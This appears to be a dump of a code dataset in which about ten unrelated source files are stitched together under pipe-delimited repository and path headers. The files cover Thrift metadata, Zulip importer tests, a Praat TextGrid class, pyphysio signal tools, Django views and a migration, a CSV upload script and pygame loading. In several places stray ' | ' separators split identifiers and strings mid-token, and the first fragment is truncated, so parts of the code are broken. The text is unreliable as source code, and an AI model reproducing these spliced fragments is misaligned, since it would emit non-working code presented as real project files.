new_struct = _fbthrift_gen_metadata_struct_MyStruct(new_struct) # myStruct
new_struct = _fbthrift_gen_metadata_struct_MyDataItem(new_struct) # myDataItem
return new_struct
def gen_metadata_struct_MyUnion() -> _fbthrift_metadata.ThriftMetadata:
return _fbthrift_gen_metadata_struct_MyUnion(_fbthrift_metadata.ThriftMetadata(structs={}, enums={}, exceptions={}, services={}))
def gen_metadata_service_MyService() -> _fbthrift_metadata.ThriftMetadata:
return _fbthrift_gen_metadata_service_MyService(_fbthrift_metadata.ThriftMetadata(structs={}, enums={}, exceptions={}, services={}))
def _fbthrift_gen_metadata_service_MyService(metadata_struct: _fbthrift_metadata.ThriftMetadata) -> _fbthrift_metadata.ThriftMetadata:
qualified_name = "module.MyService"
if qualified_name in metadata_struct.services:
return metadata_struct
functions = [
_fbthrift_metadata.ThriftFunction(name="ping", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_VOID_TYPE), arguments=[
], exceptions = [
], is_oneway=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftFunction(name="getRandomData", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_STRING_TYPE), arguments=[
], exceptions = [
], is_oneway=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftFunction(name="sink", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_VOID_TYPE), arguments=[
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_I64_TYPE), name="sink", is_optional=False, structured_annotations=[
]),
], exceptions = [
], is_oneway=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftFunction(name="putDataById", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_VOID_TYPE), arguments=[
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_I64_TYPE), name="id", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=2, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_STRING_TYPE), name="data", is_optional=False, structured_annotations=[
]),
], exceptions = [
], is_oneway=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftFunction(name="hasDataById", return_type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_BOOL_TYPE), arguments=[
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_I64_TYPE), name="id", is_o |
tommyip/zulip | zerver/tests/test_mattermost_importer.py | Python | apache-2.0 | 22,277 | 0.002693 | import os
import ujson
import filecmp
import logging
from typing import Dict, Any, List
from zerver.lib.import_realm import (
do_import_realm,
)
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.data_import.mattermost_user import UserHandler
from zerver.data_import.mattermost import mattermost_data_file_to_dict, process_user, convert_user_data, \
create_username_to_user_mapping, label_mirror_dummy_users, reset_mirror_dummy_users, \
convert_channel_data, write_emoticon_data, get_mentioned_user_ids, check_user_in_team, \
build_reactions, get_name_to_codepoint_dict, do_convert_data
from zerver.data_import.sequencer import IdMapper
from zerver.data_import.import_util import SubscriberHandler
from zerver.models import Reaction, UserProfile, Message, get_realm
class MatterMostImporter(ZulipTestCase):
logger = logging.getLogger()
# set logger to a higher level to suppress 'logger.INFO' outputs
logger.setLevel(logging.WARNING)
    def setUp(self) -> None:
        """Load the shared Mattermost export fixture and build the
        username -> user mapping that every test starts from."""
        fixture_file_name = self.fixture_file_name("export.json", "mattermost_fixtures")
        self.mattermost_data = mattermost_data_file_to_dict(fixture_file_name)
        self.username_to_user = create_username_to_user_mapping(self.mattermost_data["user"])
        # Undo any mirror-dummy labelling left over from a previous test
        # (tests call label_mirror_dummy_users on this shared mapping).
        reset_mirror_dummy_users(self.username_to_user)
def test_mattermost_data_file_to_dict(self) -> None:
self.assertEqual(len(self.mattermost_data), 6)
self.assertEqual(self.mattermost_data["version"], [1])
self.assertEqual(len(self.mattermost_data["team"]), 2)
self.assertEqual(self.mattermost_data["team"][0]["name"], "gryffindor")
self.assertEqual(len(self.mattermost_data["channel"]), 5)
self.assertEqual(self.mattermost_data["channel"][0]["name"], "gryffindor-common-room")
self.assertEqual(self.mattermost_data["channel"][0]["team"], "gryffindor")
self.assertEqual(len(self.mattermost_data["user"]), 5)
self.assertEqual(self.mattermost_data["user"][1]["username"], "harry")
self.assertEqual(len(self.mattermost_data["user"][1]["teams"]), 1)
self.assertEqual(len(self.mattermost_data["post"]), 20)
self.assertEqual(self.mattermost_data["post"][0]["team"], "gryffindor")
self.assertEqual(self.mattermost_data["post"][0]["channel"], "dumbledores-army")
self.assertEqual(self.mattermost_data["post"][0]["user"], "harry")
self.assertEqual(len(self.mattermost_data["post"][0]["replies"]), 1)
self.assertEqual(len(self.mattermost_data["emoji"]), 2)
self.assertEqual(self.mattermost_data["emoji"][0]["name"], "peerdium")
def test_process_user(self) -> None:
user_id_mapper = IdMapper()
harry_dict = self.username_to_user["harry"]
harry_dict["is_mirror_dummy"] = False
realm_id = 3
team_name = "gryffindor"
user = process_user(harry_dict, realm_id, team_name, user_id_mapper)
self.assertEqual(user["avatar_source"], 'G')
self.assertEqual(user["delivery_email"], "harry@zulip.com")
self.assertEqual(user["email"], "harry@zulip.com")
self.assertEqual(user["full_name"], "Harry Potter")
self.assertEqual(user["id"], 1)
self.assertEqual(user["is_active"], True)
self.assertEqual(user["is_realm_admin"], True)
self.assertEqual(user["is_guest"], False)
self.assertEqual(user["is_mirror_dummy"], False)
self.assertEqual(user["realm"], 3)
self.assertEqual(user["short_name"], "harry")
self.assertEqual(user["timezone"], "UTC")
team_name = "slytherin"
snape_dict = self.username_to_user["snape"]
snape_dict["is_mirror_dummy"] = True
user = process_user(snape_dict, realm_id, team_name, user_id_mapper)
self.assertEqual(user["avatar_source"], 'G')
self.assertEqual(user["delivery_email"], "snape@zulip.com")
self.assertEqual(user["email"], "snape@zulip.com")
self.assertEqual(user["full_name"], "Severus Snape")
self.assertEqual(user["id"], 2)
self.assertEqual(user["is_active"], False)
self.assertEqual(user["is_realm_admin"], False)
self.assertEqual(user["is_guest"], False)
self.assertEqual(user["is_mirror_dummy"], True)
self.assertEqual(user["realm"], 3)
self.assertEqual(user["short_name"], "snape")
self.assertEqual(user["timezone"], "UTC")
def test_convert_user_data(self) -> None:
user_id_mapper = IdMapper()
realm_id = 3
team_name = "gryffindor"
user_handler = UserHandler()
convert_user_data(user_handler, user_id_mapper, self.username_to_user, realm_id, team_name)
self.assertTrue(user_id_mapper.has("harry"))
self.assertTrue(user_id_mapper.has("ron"))
self.assertEqual(user_handler.get_user(user_id_mapper.get("harry"))["full_name"], "Harry Potter")
self.assertEqual(user_handler.get_user(user_id_mapper.get("ron"))["full_name"], "Ron Weasley")
team_name = "slytherin"
user_handler = UserHandler()
convert_user_data(user_handler, user_id_mapper, self.username_to_user, realm_id, team_name)
self.assertEqual(len(user_handler.get_all_users()), 3)
self.assertTrue(user_id_mapper.has("malfoy"))
self.assertTrue(user_id_mapper.has("pansy"))
self.assertTrue(user_id_mapper.has("snape"))
team_name = "gryffindor"
# Snape is a mirror dummy user in Harry's team.
label_mirror_dummy_users(team_name, self.mattermost_data, self.username_to_user)
user_handler = UserHandler()
convert_user_data(user_handler, user_id_mapper, self.username_to_user, realm_id, team_name)
self.assertEqual(len(user_handler.get_all_users()), 3)
self.assertTrue(user_id_mapper.has("snape"))
team_name = "slytherin"
user_handler = UserHandler()
convert_user_data(user_handler, user_id_mapper, self.username_to_user, realm_id, team_name)
self.assertEqual(len(user_handler.get_all_users()), 3)
def test_convert_channel_data(self) -> None:
user_handler = UserHandler()
subscriber_handler = SubscriberHandler()
stream_id_mapper = IdMapper()
user_id_mapper = IdMapper()
team_name = "gryffindor"
convert_user_data(
user_handler=user_handler,
user_id_mapper=user_id_mapper,
user_data_map=self.username_to_user,
realm_id=3,
team_name=team_name,
)
zerver_stream = convert_channel_data(
channel_data=self.mattermost_data["channel"],
user_data_map=self.username_to_user,
subscriber_handler=subscriber_handler,
stream_id_mapper=stream_id_mapper,
user_id_mapper=user_id_mapper,
realm_id=3,
team_name=team_name,
)
self.assertEqual(len(zerver_stream), 3)
self.assertEqual(zerver_stream[0]["name"], "Gryffindor common room")
self.assertEqual(zerver_stream[0]["invite_only"], False)
self.assertEqual(zerver_stream[0]["descrip | tion"], "A place for talking about Gryffindor common room")
self.assertEqual(zerver_stream[0]["rendered_description"], "")
self.assertEqual(zerver_stream[0]["realm"], 3)
self.assertEqual(zerver_stream[1]["name"], "Gryffindor quidditch team")
self.assertEqual(zerver_stream[1]["invite_only"], False)
self.a | ssertEqual(zerver_stream[1]["description"], "A place for talking about Gryffindor quidditch team")
self.assertEqual(zerver_stream[1]["rendered_description"], "")
self.assertEqual(zerver_stream[1]["realm"], 3)
self.assertEqual(zerver_stream[2]["name"], "Dumbledores army")
self.assertEqual(zerver_stream[2]["invite_only"], True)
self.assertEqual(zerver_stream[2]["description"], "A place for talking about Dumbledores army")
self.assertEqual(zerver_stream[2]["rendered_description"], "")
self.assertEqual(zerver_stream[2]["realm"], 3)
self.assertTrue(stream_id_mapper.has("gryffindor-common-room"))
|
dresen/praat | scripts/TextGrid.py | Python | mit | 17,423 | 0.001148 | import codecs
import os
import subprocess
import sys
from Tier import Tier
from Interval import Interval
from operator import itemgetter, attrgetter
from numpy import array as nparray
from praatNumericParser import parse as numParse
from praatPitchParser import parse as pitchParse
SCRIPT = '[TextGrid.py]: '
class Grid(object):
"""
A class for storing a Praat TextGrid and performing data transformations
and analyses. """
    def __init__(self, xmin, xmax, size, nid, wav=False, outpath=False):
        """Create a Grid.

        xmin/xmax -- start/end of the grid (TextGrid xmin/xmax)
        size      -- declared number of tiers
        nid       -- identifier for this grid
        wav       -- optional path to an associated sound file (False = none)
        outpath   -- optional directory prepended to output file names
        """
        super(Grid, self).__init__()
        self.xmin = xmin
        self.xmax = xmax
        self.size = size
        self.tiers = []
        self.id = nid
        self.resize()   # initializes self.currentsize from self.tiers
        self.tidx = {}  # tier-name -> Tier, used by __getitem__/getTier
        self.wav = wav
        self.outpath = outpath
def __str__(self):
"""Defining print function. Use for diagnostics"""
print("\nTextGrid info:")
print("ID: ", self.id)
if self.wav:
print("Grid sound file: ", self.wav)
print("Grid start: ", self.xmin)
print("Grid end: ", self.xmax)
print("Number of tiers: ", self.size)
print("Current number of tiers: ", self.currentsize)
print("\nCurrent tiers:\n")
for t in self.tiers:
print(t.id)
return ''
def __getitem__(self, key):
return self.tidx[key]
def keys(self):
"""Returns a list of the names of the Tier objects in the Grid"""
return self.tidx.keys()
def addTier(self, newtier):
"""Add a tier to the grid and update the grid size."""
self.tiers.append(newtier)
self.tidx[newtier.id] = newtier
self.resize()
def addWav(self, fp):
"""Associate a wav file to the Grid object."""
assert os.path.exists(fp) == True
self.wav = fp
def resize(self):
"""Update grid size."""
self.currentsize = len(self.tiers)
def printGrid(self, filename, rmtiernames=[]):
"""Print function to output a TextGrid to load into praat."""
if type(filename) == str:
if self.outpath:
fout = codecs.open(
os.path.join(self.outpath, filename), 'w', 'utf8')
else:
fout = codecs.open(filename, 'w', 'utf8')
else:
fout = filename
tierFilter = [self.getTier(x) for x in rmtiernames]
tiers = [x for x in self.tiers if x not in tierFilter]
header = ['File type = "ooTextFile"',
'Object class = "TextGrid"',
'',
'xmin = ' + str(self.xmin),
'xmax = ' + str(self.xmax),
'tiers? <exists>',
'size = ' + str(len(tiers)),
'item []:'
]
fout.write("\n".join(header) + '\n')
for n, t in enumerate(tiers):
fout.write(' ' * 4 + 'item [' + str(n + 1) + ']:\n')
t.printGrid(fout)
fout.close()
def getTier(self, name):
"""Method to retrieve a tier by id ( which is a name ) .
Replaced by the __getitem__() function, but kept for convenience"""
return self.tidx[name]
def extractKaldiData(self, textTierName, recid):
"""Extract segments, uttids and text from the tier that contins text"""
tier = self.tidx[textTierName]
id_length = len(str(tier.size))
text = []
segments = []
uttids = []
for interval in tier.intervals:
uttids.append('-'.join((recid, str(interval.id).zfill(id_length))))
text.append(interval.getText())
segments.append('{:0.3f} {:1.3f}'.format(interval.xmin,
interval.xmax)
)
return (uttids, segments, text, self.wav)
def extractTier(self, srcTiername, name, symbol):
"""Extract a tier from another tier based on the
occurrence of a substring. """
srcTier = self.getTier(srcTiername)
tgtTier = Tier(srcTier.xmin, srcTier.xmax, srcTier.size, name)
for i in srcTier.intervals:
if symbol in i.text:
tgtTier.addInterval(i.copy('"' + symbol + '"'))
else:
tgtTier.addInterval(i.copy('""'))
self.addTier(tgtTier)
def extractMajorityTier(self, srcTiernames, name, symbol, majority):
"""Extract a tier from a set of tiers based on a majority vote of the
occurr ence of the substring in $symbol."""
ntiers = len(srcTiernames)
# Sanity check, cannot ask for a larger majority than there are votes
assert ntiers >= majority
srctiers = [self.getTier(x).intervals for x in srcTiernames]
srcMat = nparray(srctiers)
template = self.getTier(srcTiernames[0])
newtier = Tier(template.xmin, template.xmax, template.size, name)
for j in range(len(srcMat[0])):
anots = sum([1 for x in srcMat[:, j] if symbol in x.text])
if anots >= majority:
newtier.addInterval(template[j].copy('"' + symbol + '"'))
else:
newtier.addInterval(template[j].copy('""'))
self.addTier(newtier)
def extractSegmentTier(self, srcTiernames, name, symbol, majority=1):
"""Collapses adjacent intervals in a tier if they have the same
annotation and updates the tier size. """
assert type(srcTiernames) == list
if len(srcTiernames) > 1:
self.extractMajorityTier(srcTiernames, name, symbol, majority)
else:
self.extractTier(srcTiernames[0], name, symbol)
self.mergeIntervals(name)
def mergeIntervals(self, name):
"""Merges Interval objects in a specific Tier that have the same
annotation. Designed for use with text annotation."""
newtier = self.getTier(name)
seed = newtier[0]
newIntervals = []
for n in range(1, newtier.currentsize):
if seed.text == newtier[n].text:
seed = seed.merge(newtier[n], seed.text)
else:
newIntervals.append(seed)
# Use copy(), otherwise intervals are passed by reference
seed = newtier[n].copy()
newtier.resize(newInterv | als)
def confusionMatrixPair(self, tier1, tier2):
"""Computes the confusion pairs between a pair of tiers."""
assert tier1.size == tier2.size
assert tier1.currentsize == tier2.currentsize
confusiontbl = {}
for n, i in enum | erate(tier1.intervals):
key = tuple(sorted([i.text, tier2[n].text]))
confusiontbl[key] = confusiontbl.get(key, 0) + 1
return confusiontbl
def confusionMatrix(self, tiernames, filename):
"""Computes the confusion pairs between an arbitrary # of tiers."""
mat = {}
ntiers = len(tiernames)
# for each tier to compare
for i in range(ntiers):
# foreach tier that is not $i and has not already been compared
for j in range(i, ntiers):
t1 = self.tidx[tiernames[i]]
t2 = self.tidx[tiernames[j]]
ctbl = self.confusionMatrixPair(t1, t2)
for k in ctbl.keys():
mat[k] = mat.get(k, 0) + ctbl[k]
self.printCMatrix(mat, filename)
def printCMatrix(self, tbl, filename, sep='\t'):
"""Prints a confusion matrix to be loaded by praat."""
if self.outpath:
filename = os.path.join(self.outpath, filename)
fout = codecs.open(filename, 'w', 'utf8')
columns = ('A1', 'A2', 'Count')
fout.write(sep.join(columns) + '\n')
lines = []
for k, v in tbl.items():
lines.append([k[0], k[1], v])
for l in sorted(lines, key=itemgetter(2), reverse=True):
l[2] = str(l[2])
fout.write(sep.join(l) + '\n')
fout.close()
def maceTiers(self, tiernames, filename, sep=','):
"""Output tiers as comma-separated lines into a csv file for Mace."""
annotations = |
K-3D/k3d | tests/mesh/mesh.modifier.MorphPoints.py | Python | gpl-2.0 | 1,275 | 0.00549 | #python
import k3d
import testing
document = k3d.new_document()
source1 = k3d.plugin.create("PolyCone", document)
source2 = k3d.plugin.create("PolySphere", document)
source3 = k3d.plugin.create("PolyCube", document)
modifier = | k3d.plugin.create("MorphPoints", document)
k3d.property.create(modifier, | "k3d::mesh*", "input1", "input1", "input1")
k3d.property.create(modifier, "k3d::mesh*", "input2", "input2", "input2")
k3d.property.create(modifier, "k3d::double_t", "amount1", "amount1", "amount1")
k3d.property.create(modifier, "k3d::double_t", "amount2", "amount2", "amount2")
k3d.property.connect(document, source1.get_property("output_mesh"), modifier.get_property("input_mesh"))
k3d.property.connect(document, source2.get_property("output_mesh"), modifier.get_property("input1"))
k3d.property.connect(document, source3.get_property("output_mesh"), modifier.get_property("input2"))
selection = k3d.geometry.selection.create(0)
point_selection = k3d.geometry.point_selection.create(selection, 1)
modifier.mesh_selection = selection
modifier.amount1 = 0.1
modifier.amount2 = 0.1
testing.require_valid_mesh(document, modifier.get_property("output_mesh"))
testing.require_similar_mesh(document, modifier.get_property("output_mesh"), "mesh.modifier.MorphPoints", 4)
|
pistatium/houkago_app | server_appengine/app/views/aff.py | Python | apache-2.0 | 1,179 | 0.000854 | # coding: utf-8
from __future__ import absolute_import, division, print_function
from django.http import HttpResponseRedirect
from django.views.decorators.cache import cache_page
from djan | go.core.urlresolvers import reverse
from django.conf.urls import patterns
fro | m app.models.app import App
from app import views
# -- Views --------------------------------------------
# ------------------------------------------------------
@cache_page(60 * 5)
def to_home(request, app_id):
    """Credit an affiliate referral (+2 points) to *app_id*, then redirect
    to the site home page."""
    # NOTE(review): @cache_page caches the redirect response for 5 minutes,
    # so the increment below only runs on a cache miss.  If every click is
    # supposed to be counted this defeats the counter; if it is deliberate
    # rate-limiting/abuse protection, confirm and document that intent.
    app = App.getById(int(app_id))
    if app:
        # 'affiriate' (sic) matches the App model's field spelling.
        app.affiriate_point_total += 2
        app.affiriate_point += 2
        app.put()
    return HttpResponseRedirect(reverse(views.home.index))
@cache_page(60 * 5)
def to_app(request, app_id):
    """Credit an affiliate referral (+1 point) to *app_id*, then redirect
    to that app's detail page."""
    # NOTE(review): as with to_home, the 5-minute response cache means the
    # increment only runs on a cache miss — confirm whether clicks within
    # the cache window are intentionally uncounted.
    app = App.getById(int(app_id))
    if app:
        app.affiriate_point_total += 1
        app.affiriate_point += 1
        app.put()
    return HttpResponseRedirect(reverse(views.home.app_detail, args=[app_id]))
# ======================================================================================
'''
URL パターン
'''
urlpatterns = patterns(None,
(r'^/to_home/(\d+)/?$', to_home),
(r'^/to_app/(\d+)/?$', to_app),
)
|
401LearningAnalytics/Project | server_side/upload.py | Python | mit | 2,202 | 0.030427 | #!/usr/bin/env python3
import sys
import os
import subprocess
import time
filename = sys.argv[1]
print("extracting " + filename)
p = subprocess.Popen(["unzip", filename, "-dintro"], stdout=subprocess.PIPE)
p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/courses.csv","courses"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/users.csv","users"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_formative_quiz_grades.csv","course_formative_quiz_grades"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_item_passing_states.csv","course_item_passing_states"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_passing_states.csv","course_passing_states"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.ph | p","intro/course_grades.csv","course_grades"],stdout=subprocess.P | IPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_modules.csv","course_modules"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_lessons.csv","course_lessons"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_items.csv","course_items"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_item_grades.csv","course_item_grades"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
p = subprocess.Popen(["php","-f","uploadtodb.php","intro/course_item_types.csv","course_item_types"],stdout=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate()
subprocess.call("rm intro/*", shell=True)
|
hacktm15/caudexer | dexer/caudexer/migrations/0003_auto_20151107_1415.py | Python | mit | 589 | 0 | # -*- coding: utf-8 -* | -
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('caudexer', '0002_auto_20151107_1409'),
]
operations = [
migrations.AlterField(
model_name='goodreadsdata',
name='good_reads_id',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='googlebooksdata',
| name='google_book_id',
field=models.CharField(max_length=100),
),
]
|
percyfal/snakemakelib | snakemakelib/exceptions.py | Python | mit | 965 | 0 | # Copyright (C) 2015 by Per Unneberg
class NotInstalledError(Exception):
    """Error thrown if program/command/application cannot be found in path.

    Args:
        msg (str): String described by exception
        code (int, optional): Error code, defaults to 2.
    """
    def __init__(self, msg, code=2):
        # Forward msg to Exception so str(exc)/tracebacks show the message
        # (previously the superclass got no args and str(exc) was empty).
        super(NotInstalledError, self).__init__(msg)
        self.msg = msg
        self.code = code
class SamplesException(Exception):
    """Error thrown if samples missing or wrong number.

    Args:
        msg (str): String described by exception
        code (int, optional): Error code, defaults to 2.
    """
    def __init__(self, msg, code=2):
        # Forward msg to Exception so str(exc)/tracebacks show the message
        # (previously the superclass got no args and str(exc) was empty).
        super(SamplesException, self).__init__(msg)
        self.msg = msg
        self.code = code
class OutputFilesException(Exception):
    """Error thrown if outputfiles missing or wrong number.

    Args:
        msg (str): String described by exception
        code (int, optional): Error code, defaults to 2.
    """
    def __init__(self, msg, code=2):
        # Forward msg to Exception so str(exc)/tracebacks show the message
        # (previously the superclass got no args and str(exc) was empty).
        super(OutputFilesException, self).__init__(msg)
        self.msg = msg
        self.code = code
|
MPBA/pyHRV | pyphysio/tools/Tools.py | Python | gpl-3.0 | 51,184 | 0.004572 | # coding=utf-8
from __future__ import division
import numpy as _np
from scipy.signal import welch as _welch, periodogram as _periodogram, freqz as _freqz
import scipy.optimize as _opt
import pycwt.wavelet as wave
from scipy import linalg as _linalg
import itertools as _itertools
from ..BaseTool import Tool as _Tool
from ..Signal import UnevenlySignal as _UnevenlySignal, EvenlySignal as _EvenlySignal
class Diff(_Tool):
    """
    Computes the differences between adjacent samples.

    Optional parameters
    -------------------
    degree : int, >0, default = 1
        Sample interval to compute the differences

    Returns
    -------
    signal :
        Differences signal.  Its length is ``degree`` samples shorter than
        the input, and its start_time is shifted forward by ``degree``
        samples so each value is aligned with the later sample of its pair.
    """

    def __init__(self, degree=1):
        assert degree > 0, "The degree value should be positive"
        _Tool.__init__(self, degree=degree)

    @classmethod
    def algorithm(cls, signal, params):
        """
        Calculates the differences between values ``degree`` samples apart:
        out[k] = signal[k + degree] - signal[k]
        """
        degree = params['degree']
        sig_1 = signal[:-degree]
        sig_2 = signal[degree:]

        out = _EvenlySignal(values=sig_2 - sig_1,
                            sampling_freq=signal.get_sampling_freq(),
                            signal_type=signal.get_signal_type(),
                            start_time=signal.get_start_time() + degree / signal.get_sampling_freq())

        return out
class PeakDetection(_Tool):
    """
    Estimate the maxima and the minima in the signal (in particular for periodic signals).

    Parameters
    ----------
    delta : float or list
        Threshold for the detection of the peaks. If it is a list it must have the same length of the signal.

    Optional parameters
    -------------------
    refractory : float, >=0, default = 0
        Seconds to skip after a detected peak to look for new peaks.
    start_max : boolean, default = True
        Whether to start looking for a maximum or (False) for a minimum.

    Returns
    -------
    maxp : numpy.array
        Array containing indexes of the maxima
    minp : numpy.array
        Array containing indexes of the minima
    maxv : numpy.array
        Array containing values of the maxima
    minv : numpy.array
        Array containing values of the minima
    """

    def __init__(self, delta, refractory=0, start_max=True):
        delta = _np.array(delta)
        assert delta.ndim <= 1, "Delta value should be 1 or 0-dimensional"
        # BUG FIX: the original `assert delta.all() > 0` only checks that
        # every element is non-zero (ndarray.all() returns a bool), so
        # negative deltas slipped through; compare element-wise instead.
        assert (delta > 0).all(), "Delta value/s should be positive"
        assert refractory >= 0, "Refractory value should be non negative"
        _Tool.__init__(self, delta=delta, refractory=refractory, start_max=start_max)

    @classmethod
    def algorithm(cls, signal, params):
        refractory = params['refractory']
        if refractory == 0:  # if 0 then do not skip samples
            refractory = 1
        else:  # else transform the refractory from seconds to samples
            refractory = refractory * signal.get_sampling_freq()
        look_for_max = params['start_max']
        delta = params['delta']
        minp = []
        maxp = []
        minv = []
        maxv = []

        # delta may be a scalar threshold or a per-sample vector.
        scalar = delta.ndim == 0
        if scalar:
            d = delta

        if len(signal) < 1:
            cls.warn("Empty signal (len < 1), returning empty.")
        elif not scalar and len(delta) != len(signal):
            cls.error("delta vector's length differs from signal's one, returning empty.")
        else:
            mn_pos_candidate = mx_pos_candidate = 0
            mn_candidate = mx_candidate = signal[0]
            i_activation_min = 0
            i_activation_max = 0

            for i in range(1, len(signal)):
                sample = signal[i]
                if not scalar:
                    d = delta[i]

                # Track the running extrema candidates.
                if sample > mx_candidate:
                    mx_candidate = sample
                    mx_pos_candidate = i
                if sample < mn_candidate:
                    mn_candidate = sample
                    mn_pos_candidate = i

                # A peak is confirmed once the signal drops (rises) by more
                # than d from the candidate, outside the refractory window.
                if look_for_max:
                    if i >= i_activation_max and sample < mx_candidate - d:  # new max
                        maxp.append(mx_pos_candidate)
                        maxv.append(mx_candidate)
                        i_activation_max = i + refractory

                        mn_candidate = sample
                        mn_pos_candidate = i

                        look_for_max = False
                else:
                    if i >= i_activation_min and sample > mn_candidate + d:  # new min
                        minp.append(mn_pos_candidate)
                        minv.append(mn_candidate)
                        i_activation_min = i + refractory

                        mx_candidate = sample
                        mx_pos_candidate = i

                        look_for_max = True
        return _np.array(maxp), _np.array(minp), _np.array(maxv), _np.array(minv)
class PeakSelection(_Tool):
    """
    Identify the start and the end indexes of each peak in the signal, using derivatives.

    Parameters
    ----------
    indices : array, >=0
        Array containing indexes (first column) and values (second column) of the maxima
    win_pre : float, >0
        Duration (in seconds) of interval before the peak that is considered to find the start of the peak
    win_post : float, >0
        Duration (in seconds) of interval after the peak that is considered to find the end of the peak

    Returns
    -------
    starts : array
        Array containing start indexes
    ends : array
        Array containing end indexes
    """

    def __init__(self, indices, win_pre, win_post):
        indices = _np.array(indices)
        assert indices.ndim < 2, "Parameter indices has to be 1 or 0-dimensional"
        # BUG FIX: the original `assert indices.all() >= 0` is always True
        # (ndarray.all() returns a bool, and both True >= 0 and False >= 0
        # hold), so negative indexes were never rejected.
        assert (indices >= 0).all(), "Parameter indices contains negative values"
        assert win_pre > 0, "Window pre peak value should be positive"
        assert win_post > 0, "Window post peak value should be positive"
        _Tool.__init__(self, indices=indices, win_pre=win_pre, win_post=win_post)

    @classmethod
    def algorithm(cls, signal, params):
        i_peaks = params['indices']
        i_pre_max = int(params['win_pre'] * signal.get_sampling_freq())
        i_post_max = int(params['win_post'] * signal.get_sampling_freq())

        # Derivative samples with |dx| <= ZERO are treated as flat.
        ZERO = 0.01
        i_start = _np.empty(len(i_peaks), int)
        i_stop = _np.empty(len(i_peaks), int)

        signal_dt = Diff()(signal)
        for i in range(len(i_peaks)):
            i_pk = int(i_peaks[i])

            # Clamp the search window to the signal boundaries.
            if i_pk < i_pre_max:
                i_st = 0
                i_sp = i_pk + i_post_max
            elif i_pk >= len(signal_dt) - i_post_max:
                i_st = i_pk - i_pre_max
                i_sp = len(signal_dt) - 1
            else:
                i_st = i_pk - i_pre_max
                i_sp = i_pk + i_post_max

            # find START: walk backwards while the derivative is rising/flat
            signal_dt_pre = signal_dt[i_st:i_pk]
            i_pre = len(signal_dt_pre) - 1

            # OR below is to allow small fluctuations (?)
            while i_pre > 0 and (signal_dt_pre[i_pre] > 0 or abs(signal_dt_pre[i_pre]) <= ZERO):
                i_pre -= 1

            i_start[i] = i_st + i_pre + 1

            # find STOP: walk forwards while the derivative is falling/flat
            signal_dt_post = signal_dt[i_pk: i_sp]
            i_post = 1

            # OR below is to allow small fluctuations (?)
            while i_post < len(signal_dt_post) - 1 and (
                    signal_dt_post[i_post] < 0 or abs(signal_dt_post[i_post]) <= ZERO):
                i_post += 1

            i_stop[i] = i_pk + i_post
        return i_start, i_stop
class SignalRange(_Tool):
"""
Estimate the local range of the signal by sliding windowing
Parameters
----------
win_len : float, >0
Length of the window in seconds
win_step : float, >0
Shift to start the next window in seconds
Optional parameters
-------------------
smooth : boolean, default=True
Whether to convolve the result with a gaussian window
Returns
-------
deltas : numpy.array
Local range of the signal |
bardlean86/SNEK_TheReckoning | graphics.py | Python | mit | 2,059 | 0.005342 | import os
import pygame as pg
import glob
import constants
pg.display.init()
video = pg.display
screen = video.set_mode(constants.display_size)
""" Preloads images and parameters """
images = glob.glob('*.png')
image_cache = {}
def get_image(path):
    """Load resources/img/<path> once and return (surface, rect, size).

    Fixes the original lookup order, which was broken three ways: it read
    the cache *before* building the real path (always None on first use),
    joined the directory with the cached value instead of the file name
    (TypeError on a cache miss), and tested the cached *value* — not the
    key — for membership, so nothing was ever memoized correctly.
    """
    full_path = os.path.join('resources', 'img', path)
    if full_path not in image_cache:
        image_cache[full_path] = pg.image.load(full_path)
    img = image_cache[full_path]
    return img, img.get_rect(), img.get_size()
for pic in images:
get_image(pic)
# Use these manually until I figure out a better solution
img_background = pg.image.load(os.path.join('resources', 'img', 'background.png')).convert()
level_size = img_background.get_size()
level_rect = img_background.get_rect()
